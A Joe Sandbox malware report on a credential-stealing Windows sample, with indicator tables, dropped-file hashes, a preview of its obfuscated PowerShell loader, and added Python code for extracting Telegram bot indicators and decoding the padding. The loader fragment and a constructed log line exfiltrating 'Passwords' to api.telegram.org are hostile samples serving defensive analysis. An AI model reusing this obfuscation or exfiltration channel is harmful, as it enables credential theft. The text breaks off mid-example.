https://nuget.org/nuget.exe | powershell.exe, 00000002.00000002.2628499104.00000000064B7000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore6lBjq | powershell.exe, 00000002.00000002.2622978623.0000000005451000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/: | msiexec.exe, 00000006.00000003.2786541789.00000000079FD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://apis.google.com | msiexec.exe, 00000006.00000003.2731968974.0000000007A3C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://checkip.dyndns.com | msiexec.exe, 00000006.00000002.3296654914.000000002366F000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://drive.usercontent.google.com/? | msiexec.exe, 00000006.00000002.3284691137.00000000079F7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2786541789.00000000079FD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://api.telegram.org | msiexec.exe, 00000006.00000002.3296654914.0000000023781000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000002.00000002.2622978623.0000000005451000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3296654914.00000000235F1000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://reallyfreegeoip.org/xml/ | msiexec.exe, 00000006.00000002.3296654914.000000002366F000.00000004.00000800.00020000.00000000.sdmp | false | | high
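The api.telegram.org strings above (a full sendDocument URL with bot token, chat_id and a "user / Passwords / <ip>" caption, plus a truncated copy ending in "chat_id=7382") are the most valuable indicators on this page: the bot id and chat_id identify the operator's channel, and the token is a live credential that belongs in a takedown request, not in a shared report. The following is an added example, not part of the Joe Sandbox report: a small parser that pulls these fields out of free text such as a strings dump or proxy log, aggregates one record per bot, redacts the token, and drops chat_ids that are only a prefix of a longer one seen for the same bot (the truncated-memory-fragment case). SAMPLE_LINES are constructed; the token, chat_id and addresses in them are placeholders, not the values from the report.

```python
"""Extract Telegram Bot API indicators from strings recovered from a sample.

Added example, not part of the Joe Sandbox report. SAMPLE_LINES are constructed;
the bot token, chat_id and IP addresses are placeholders, not report values.
"""
import re
from typing import Dict, Optional
from urllib.parse import parse_qs, urlsplit

# Bot API path: /bot<bot id>:<secret>/<method>. The bot id is the stable,
# shareable part; the secret after the colon is the credential.
TOKEN_PATH_RE = re.compile(r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>[A-Za-z]+)$")
# Loose matcher for pulling candidate URLs out of free text.
URL_RE = re.compile(r"https?://api\.telegram\.org/\S*")

SAMPLE_LINES = [
    # constructed proxy-log line for the exfil POST
    "2024-12-17T11:05:12Z msiexec.exe POST https://api.telegram.org/bot1234567890:AAFexampleSecretPart000000000000000/sendDocument?chat_id=9876543210&caption=user%20/%20Passwords%20/%20203.0.113.7",
    # constructed truncated copy, the kind of fragment a memory dump yields
    "strings: https://api.telegram.org/bot1234567890:AAFexampleSecretPart000000000000000/sendDocument?chat_id=98765",
    # constructed bare prefixes with no token; must not produce a record
    "strings: https://api.telegram.org/bot",
    "strings: https://api.telegram.org",
    # constructed unrelated line
    "2024-12-17T11:05:10Z msiexec.exe GET http://checkip.dyndns.org/",
]


def parse_telegram_url(url: str) -> Optional[dict]:
    """Return bot_id, token, method, chat_id and caption for a Bot API URL, else None."""
    parts = urlsplit(url.strip())
    if parts.hostname != "api.telegram.org":
        return None
    m = TOKEN_PATH_RE.match(parts.path)
    if not m:
        return None
    query = parse_qs(parts.query)  # parse_qs percent-decodes the values
    return {
        "bot_id": m["bot_id"],
        "token": f"{m['bot_id']}:{m['secret']}",
        "method": m["method"],
        "chat_id": query.get("chat_id", [None])[0],
        "caption": query.get("caption", [None])[0],
    }


def redact_token(token: str) -> str:
    """Keep the bot id and the secret's edges so analysts can correlate without reusing it."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}...{secret[-4:]}"


def extract_indicators(lines) -> Dict[str, dict]:
    """Aggregate one record per bot id across all lines."""
    bots: Dict[str, dict] = {}
    for line in lines:
        for url in URL_RE.findall(line):
            rec = parse_telegram_url(url)
            if rec is None:
                continue
            bot = bots.setdefault(rec["bot_id"], {
                "token_redacted": redact_token(rec["token"]),
                "methods": set(), "chat_ids": set(), "captions": set(),
            })
            bot["methods"].add(rec["method"])
            if rec["chat_id"]:
                bot["chat_ids"].add(rec["chat_id"])
            if rec["caption"]:
                bot["captions"].add(rec["caption"])
    # A chat_id that is a strict prefix of another one for the same bot is a
    # truncated memory fragment, not a second channel; drop it.
    for bot in bots.values():
        ids = bot["chat_ids"]
        bot["chat_ids"] = {c for c in ids if not any(d != c and d.startswith(c) for d in ids)}
    return bots


if __name__ == "__main__":
    for bot_id, info in extract_indicators(SAMPLE_LINES).items():
        print(bot_id, info)
```

The prefix rule is deliberately narrow: it only collapses a chat_id into a longer one from the same bot, so two genuinely different channels are never merged. The caption format is what makes the stealer family recognisable in proxy logs even when the token rotates, so it is kept as an indicator alongside the bot id.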
Contacted IPs
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
142.250.181.1 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
172.217.19.174 | drive.google.com | United States | 15169 | GOOGLEUS | false
                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1576692
                                                                              Start date and time:2024-12-17 12:04:05 +01:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 7m 10s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:9
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:dP5z8RpEyQ.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:57a4244a8e2bdb2428fb0801c42f6c78af7ec0ef1b23bd558e01ecb61a1104b1.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@9/13@4/4
                                                                              EGA Information:
                                                                              • Successful, ratio: 66.7%
                                                                              HCA Information:
                                                                              • Successful, ratio: 96%
                                                                              • Number of executed functions: 103
                                                                              • Number of non-executed functions: 46
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe
                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                              • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.43
                                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Execution Graph export aborted for target powershell.exe, PID 2780 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                              • VT rate limit hit for: dP5z8RpEyQ.exe
Time | Type | Description
06:04:56 | API Interceptor | 45x Sleep call for process: powershell.exe modified
Similar samples by IP
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | Ls4O6Pmixd.exe | malicious | Phemedrone Stealer |
149.154.167.220 | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | PAYMENT ADVICE TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | pre-stowage.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger |
149.154.167.220 | Order129845.exe | malicious | AgentTesla |
149.154.167.220 | PURCHASE ORDER TRC-0909718-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
149.154.167.220 | Justificante pago-09453256434687.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
149.154.167.220 | l9IH82eiKw.exe | malicious | Unknown |
149.154.167.220 | l9IH82eiKw.exe | malicious | Unknown |
193.122.130.0 | pre-stowage.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | PURCHASE ORDER TRC-0909718-24_pdf.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | ref_97024130865.exe | malicious | MassLogger RAT, PureLog Stealer | checkip.dyndns.org/
193.122.130.0 | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
193.122.130.0 | REQUEST FOR QUOATION AND PRICES 0910775_pdf.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | SWIFT09181-24_pdf.exe | malicious | GuLoader, MassLogger RAT | checkip.dyndns.org/
193.122.130.0 | file.exe | malicious | Amadey, AsyncRAT, HVNC, LummaC Stealer, RedLine, Stealc | checkip.dyndns.org/
193.122.130.0 | AsyncClient.exe | malicious | AsyncRAT, HVNC, PureLog Stealer | checkip.dyndns.org/
193.122.130.0 | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | checkip.dyndns.org/
Similar samples by domain
Match | Associated Sample Name / URL | Detection | Threat Name | Context
checkip.dyndns.com | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | MV GOLDEN SCHULTE DETAILS.exe | malicious | Snake Keylogger | 193.122.6.168
checkip.dyndns.com | PAYMENT ADVICE TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 158.101.44.242
checkip.dyndns.com | pre-stowage.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
checkip.dyndns.com | hesaphareketi-01.pdf.exe | malicious | Snake Keylogger | 132.226.247.73
checkip.dyndns.com | PURCHASE ORDER TRC-0909718-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 193.122.130.0
checkip.dyndns.com | Justificante pago-09453256434687.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 158.101.44.242
checkip.dyndns.com | pedido-035241.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 193.122.6.168
checkip.dyndns.com | QUOTATION REQUEST - BQS058.exe | malicious | MassLogger RAT | 193.122.6.168
api.telegram.org | Ls4O6Pmixd.exe | malicious | Phemedrone Stealer | 149.154.167.220
api.telegram.org | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | PAYMENT ADVICE TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | pre-stowage.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | Order129845.exe | malicious | AgentTesla | 149.154.167.220
api.telegram.org | PURCHASE ORDER TRC-0909718-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
api.telegram.org | Justificante pago-09453256434687.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
api.telegram.org | l9IH82eiKw.exe | malicious | Unknown | 149.154.167.220
api.telegram.org | l9IH82eiKw.exe | malicious | Unknown | 149.154.167.220
Similar samples by ASN
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | Ls4O6Pmixd.exe | malicious | Phemedrone Stealer | 149.154.167.220
TELEGRAMRU | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | PAYMENT ADVICE TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | pre-stowage.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | 69633f.msi | malicious | Vidar | 149.154.167.99
TELEGRAMRU | Order129845.exe | malicious | AgentTesla | 149.154.167.220
TELEGRAMRU | PURCHASE ORDER TRC-0909718-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
TELEGRAMRU | Justificante pago-09453256434687.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
TELEGRAMRU | l9IH82eiKw.exe | malicious | Unknown | 149.154.167.220
ORACLE-BMC-31898US | https://machino.com/ | malicious | CAPTCHA Scam ClickFix | 152.67.3.57
ORACLE-BMC-31898US | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 158.101.44.242
ORACLE-BMC-31898US | MV GOLDEN SCHULTE DETAILS.exe | malicious | Snake Keylogger | 193.122.6.168
ORACLE-BMC-31898US | PAYMENT ADVICE TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 158.101.44.242
ORACLE-BMC-31898US | pre-stowage.PDF.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
ORACLE-BMC-31898US | HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 193.122.130.0
ORACLE-BMC-31898US | ldr.ps1 | malicious | GO Miner, Xmrig | 147.154.227.160
ORACLE-BMC-31898US | PURCHASE ORDER TRC-0909718-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 193.122.130.0
ORACLE-BMC-31898US | end.exe | malicious | Unknown | 130.61.86.87
ORACLE-BMC-31898US | Justificante pago-09453256434687.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 158.101.44.242
Similar samples by JA3 fingerprint
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | Clienter.dll.dll | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | JkICQ13OOY.dll | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Clienter.dll.dll | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | http://85off-lv.com | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | V65xPrgEHH.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | fGZLZhXIt1.bat | malicious | Unknown | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.hta | malicious | Cobalt Strike, Remcos | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | Ls4O6Pmixd.exe | malicious | Phemedrone Stealer | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | TEKLİF İSTEĞİ - TUSAŞ TÜRK HAVACILIK UZAY SANAYİİ_xlsx.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
3b5074b1b5d032e5620f69f9f700ff0e | V7giEUv6Ee.bat | malicious | Unknown | 149.154.167.220
37f463bf4616ecd445d4a1937da06e19 | hpEAJnNwCB.exe | malicious | LummaC |
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  ref095vq842r70_classement_atout_france.pdf.lnk.d.lnkGet hashmaliciousRedLine, SectopRATBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  PAYMENT ADVICE TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  bxAoaISZJQ.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  ei0woJS3Dy.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  tz1WicW6sG.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  Assinar_PDF_3476.lNK.lnkGet hashmaliciousUnknownBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  Sublabially.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                  • 142.250.181.1
                                                                                                  • 172.217.19.174
                                                                                                  No context

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: modified
Size (bytes): 14744
Entropy (8bit): 4.992175361088568
Encrypted: false
SSDEEP: 384:f1VoGIpN6KQkj2qkjh4iUxehQJKoxOdBMNXp5YYo0ib4J:f1V3IpNBQkj2Ph4iUxehIKoxOdBMNZiA
MD5: A35685B2B980F4BD3C6FD278EA661412
SHA1: 59633ABADCBA9E0C0A4CD5AAE2DD4C15A3D9D062
SHA-256: 3E3592C4BA81DC975DF395058DAD01105B002B21FC794F9015A6E3810D1BF930
SHA-512: 70D130270CD7DB757958865C8F344872312372523628CB53BADE0D44A9727F9A3D51B18B41FB04C2552BCD18FAD6547B9FD0FA0B016583576A1F0F1A16CB52EC
Malicious: false
Reputation: moderate, very likely benign file

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode

(Three further files dropped by powershell.exe with the same file type, size, entropy, hashes and preview as the entry above.)

Process: C:\Users\user\Desktop\dP5z8RpEyQ.exe
File Type: data
Category: dropped
Size (bytes): 346094
Entropy (8bit): 1.260238196149209
Encrypted: false
SSDEEP: 768:lwgDCzH44iLM/ndTaN9uR+pcg+N4stJqJQGW6HbVShdw3UKO6LtPNm9KEku6xUek:lwsCkEGLseQwu68ODL1lMpQN
MD5: 866E55601DA25A5CB6B40855B21CDA12
SHA1: 76E8A639D1EA07C03555F3143C5E1DBB1954598A
SHA-256: 1BA5AF6DF8DE3A9D9C4F63A5FE47933A4D5940778F35F31823CFDD9CE2941DC0
SHA-512: 721EDD042ED05E7A4D15D2B1C3200F3C5468AC67687589C12016332E6E2D7DF318AE0387E11968F2E6F2BC49AB0B3B52D6BCA7E853C31C06D90DB213667CC749
Malicious: false

Process: C:\Users\user\Desktop\dP5z8RpEyQ.exe
File Type: data
Category: dropped
Size (bytes): 412942
Entropy (8bit): 1.2515095625023966
Encrypted: false
SSDEEP: 1536:v0W4UWhkzhz2MaXndEMhRnCqiUOL21ezSGMHdRnsGho:vIk12Bdfhz421eeGS
MD5: 9F1A16425E1AC7217A1EAF772B60A1CE
SHA1: D4AF081C4A2834718F86B7A3EAEA6A19B1B1CE40
SHA-256: 3CCCCC1F5F6180A0CF200F973D9A91E7DE6403C03B3CA350D6E7705CEAB5746E
SHA-512: 3577863E0CE0120790040B8B039506D211F4E6A360DCF5EDC93BCAE8ECA84A9D41AAC1BD8A059AA310E08DCCD9B77D011524F567A30CAEA550D6E0A56C0CE885
Malicious: false

Process: C:\Users\user\Desktop\dP5z8RpEyQ.exe
File Type: data
Category: dropped
Size (bytes): 465866
Entropy (8bit): 1.2514432236200588
Encrypted: false
SSDEEP: 1536:vHqN+QT7NbiCsIpfQDI+xuQpuOI+tLuP08PFz+yrWf3Q1C:vKNzoCsIxQ5uQQO4D0yC4Q
MD5: D8A0163EED8669B65C2F2DDC450692C5
SHA1: 871F4295509FE783E5BCA0D3F2A5219F5CF9E1D5
SHA-256: 4058D63BB05B740BF8F3D0AFA6D66E26B116176BE8EEAF53DE899C89EE004BAC
SHA-512: BAF4842650727E7616933FAF4F7C35BB6A34E0154D2F6592D1E73F22319D77D5F0836B2B620380A8228F98DDA3096560EC4E0C395FD3638F0A770B603CD78210
Malicious: false

Process: C:\Users\user\Desktop\dP5z8RpEyQ.exe
File Type: data
Category: dropped
Size (bytes): 488692
Entropy (8bit): 1.2603012808246417
Encrypted: false
SSDEEP: 1536:YErbOR7jAcNL+UV+dVXY7Uf7JAumIpcnXoe/:drQ78cjVmXYof7JAuh
MD5: 09F763BA39A24F93598CD2C89B5B4FDD
SHA1: 3957EE388E824359D925B7D06E252564E5D8364C
SHA-256: 5C1B06A6BBEA8227CD879215257E7D1B622CA45A86D9F7B79F7F5509F345453D
SHA-512: 1BE9944FDB9657CF154885AB492F3446ACB643F0FDA3ED8C1D6B8376F3DD539CA932402D2FC3B6D302945E4BAB8343B3F71EFA712AD7FCAA30811CB938E2F9AE
Malicious: false

Process: C:\Users\user\Desktop\dP5z8RpEyQ.exe
File Type: ASCII text, with very long lines (319), with CRLF line terminators
Category: dropped
Size (bytes): 550
Entropy (8bit): 4.2793418541681625
Encrypted: false
SSDEEP: 12:lXkKyDv7SKGNsQA8Br/OTuUmDrAM9MhrdEoRIEAU+/mKTxQ:NDYmdzrrwuf3YxiVP/mGxQ
MD5: 967A6AC85E1CDB898B7BE498438BB192
SHA1: E9EACBEA72CDBA06DE0C82F142F49FDC5271F60D
SHA-256: BE9BD9780A7ACE4D5EA238417CC9D3FD3CC20C39914B703E118E9DF0EA9DC544
SHA-512: 9F26F6C62F069706972E4BB695E3BE1F82A7B495D7770AB6771F0B4DA4293355E6D5CE9975EDEC8B9B8AB82730A025DE23199033EB41355F6D36FE20A99016F4
Malicious: false
Preview: overheadprojektorens computist depravement muslims bndslers spredningsmetoders inconsumable,bogholderierne wahl bosatte,boweling fenouillet snadden pleasantness assman naevoid forspildes.caddicefly bagind tidemarks novemberdagenes acediamine tennisens salpernes ambitious gypsying abying rikkes superterraneous micklass..proklitisk cockbilled foderblandingers benpiber eksistensberettigelsers bundens.changos termitboerne inaktivt nonsynthetical oilish macrocheilia sikkerhedsanordnings bryderis splicers molybdocardialgia hvergang ufremkommelighed..

Process: C:\Users\user\Desktop\dP5z8RpEyQ.exe
File Type: data
Category: dropped
Size (bytes): 407810
Entropy (8bit): 1.2513140336585074
Encrypted: false
SSDEEP: 768:oDCT778iwaK5hrCTUS+XZiMbIjrrNapegGNn5a71/uvQY2wCtc0F6vjmGW69XvDr:Ghr8oluBBY/+9fZiYOn7eTFrbojHl+
MD5: AB95CAF19BED14E2F50D1AB015DAB1CC
SHA1: 59938F74BA9B3E641874221E2256011D5B563969
SHA-256: 815EB8FB0D8512235429CCF3993ED9EE2626ECE8A53BC723A1BE45FF29026832
SHA-512: 3984DE8FA9261C1FED982B968BC69D83DCEC250084EA65595E6FF668E733614864A820AD8B66CB0D39D3E21E09AB13E5811D131A365F1097FC49873511D1C13F
Malicious: false
                                                                                                  Preview:.........................@........&......................................................b..............S....p...........................................^..............................6..........u..........................7.................................)..............}..............................o................a.........1........................................................................................f...........................................J...................(......(.......).......................g.....O........Y.................D........&...........X.................................................................5.................................."[.............~..........................................}......................[.......................................................".............|.....................................................................!............l................................................^........................................
                                                                                                  Process:C:\Users\user\Desktop\dP5z8RpEyQ.exe
                                                                                                  File Type:ASCII text, with very long lines (4375), with CRLF, LF line terminators
                                                                                                  Category:dropped
                                                                                                  Size (bytes):71938
                                                                                                  Entropy (8bit):5.170526697757035
                                                                                                  Encrypted:false
                                                                                                  SSDEEP:1536:IjpVbImbWa4UGqsXE3FPZ/JTVAoc0SYxEtfIZyd80pIDP:APpWMSE3dZ1cCCSZydtOL
                                                                                                  MD5:3C498D0B534B7F6C953D6535231AC945
                                                                                                  SHA1:EF27C35F06E00D3EA2B0843242EEFE05D3DC6849
                                                                                                  SHA-256:BB83D905F078B5E750204B9EA347D1C3F68365E634833A52D5D2F5707E96544B
                                                                                                  SHA-512:0ACBAF462636D17ECA13EA738C3AE3A10A7E2736B4AEB11C0E76C1A96AAD08975AABEEE66A4815AD2753CA883147330E74D9A50B0B1B53062E24B479EC6A5B33
                                                                                                  Malicious:true
                                                                                                  Preview:$Lated28=$Granulationerne;..<#barrikaderingers Remserne Taktikken Agglutinations Splendidt #>..<#Akkilessenes Vederstyggelighed Vaginipennate Rkensandet Azure #>..<#Exognathion Checkkontoen Macrotherioid #>..<#Contrariwise pistilliform Apostrof #>..<#Udnvnelseskompetencen Lingvistiskes Undernourishment Firecifrede Nondecatoic #>..<#Mangue Tsedrengens Unsecurable Layoutmands #>...$griflede = @'.A,nabet.Hjlpemo$Go tfolWUsgsgooe Desoria TelefolrangsfosTo,enon=Headpho$KardinaHPompserjPiranhaetudbrlemSkrikeamUglifyueStofp imOverhalepils ernInterafnAdopt neBolsjevskohortekprov sieRegionstBlobbersOvarioc;Nomi al.Carbolif thmoluBlodplan,ndotracSkavekntTrappydi imatiaoSt nfisnHush ld AntilytBHagendeaSkiffomldealcohaMedianin fieldwcAmerce e S rjterGyp,yis Friture(unmolli$ UhyggeOabsorbivQuadruae stofndnAfsyngemPrintmeaHy ercanMisaffi,Toxipho$Clearh,SColoniatPtomai rDu,ligsaKbehuleaSvingtutnaphthoaUnqualigRisengresprl ket Vankels Bouffo) Blrero Delen e{Chemico. ognat.Udsmide$For.gsaVMenstrueQ.e
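The preview of this dropped .ps1 shows the obfuscation that the "suspicious powershell code" signature fires on: <# ... #> comment blocks stuffed with dictionary words, and a single-quoted here-string ($griflede = @'...'@) in which the real script is padded with filler. Reading every 8th character of that here-string starting at position 7 yields $Weals=$Hjemmemenneskets; and the beginning of a function declaration. The decoder below is an added example written for this report, not code from Joe Sandbox or from the sample; stride 8 / offset 7 is an observation from the preview (which drops non-ASCII bytes, so the alignment drifts further in), so the decoder searches for the layout instead of hard-coding it, and the script's own Substring/indexing logic remains the authority. The sample input is constructed in the same shape as the dropped file.

```python
"""Decoder for the padded here-string obfuscation in the dropped PowerShell file.

Added example for this report (not sandbox or sample code). Assumptions:
stride 8 / offset 7 are only what the preview suggests; guess_layout() searches
for the real layout by scoring candidates for PowerShell syntax.
"""
import re
from itertools import cycle

BLOCK_COMMENT = re.compile(r"<#.*?#>", re.DOTALL)
HERE_STRING = re.compile(r"@'\r?\n(.*?)\r?\n'@", re.DOTALL)
SYNTAX = re.compile(r"[$=;(){}]")
KEYWORDS = re.compile(r"\b(function|param|foreach|while|return|if)\b")


def strip_block_comments(src: str) -> str:
    """Drop <# ... #> blocks; in this family they carry only filler words."""
    return BLOCK_COMMENT.sub("", src)


def here_strings(src: str) -> list:
    """Bodies of single-quoted here-strings (@' ... '@); PowerShell does not interpolate them."""
    return HERE_STRING.findall(src)


def unpad(payload: str, stride: int, offset: int) -> str:
    """Keep one character per block of `stride` characters: the one at `offset`."""
    return payload[offset::stride]


def layout_score(candidate: str) -> float:
    """Density of PowerShell syntax characters plus a bonus for intact keywords.
    Filler is letters, so $ = ; ( ) { } and whole keywords only line up when
    stride and offset are right; using density rather than a raw count stops
    a stride that merely contains the right positions (4 when the truth is 8,
    or 16 which keeps half of them) from winning."""
    if not candidate:
        return 0.0
    hits = len(SYNTAX.findall(candidate)) + 10 * len(KEYWORDS.findall(candidate))
    return hits / len(candidate)


def guess_layout(payload: str, max_stride: int = 16) -> tuple:
    """Return (stride, offset) with the best layout_score over all candidates."""
    best, best_score = (1, 0), -1.0
    for stride in range(2, max_stride + 1):
        for offset in range(stride):
            score = layout_score(unpad(payload, stride, offset))
            if score > best_score:
                best, best_score = (stride, offset), score
    return best


def decode(src: str) -> list:
    """Strip comments, then recover the script hidden in each here-string."""
    recovered = []
    for body in here_strings(strip_block_comments(src)):
        stride, offset = guess_layout(body)
        recovered.append(unpad(body, stride, offset))
    return recovered


# Constructed test input in the shape of the dropped script. Filler is letters
# only (words lifted from the sample's own comment blocks) so the word-boundary
# keyword check above is unambiguous.
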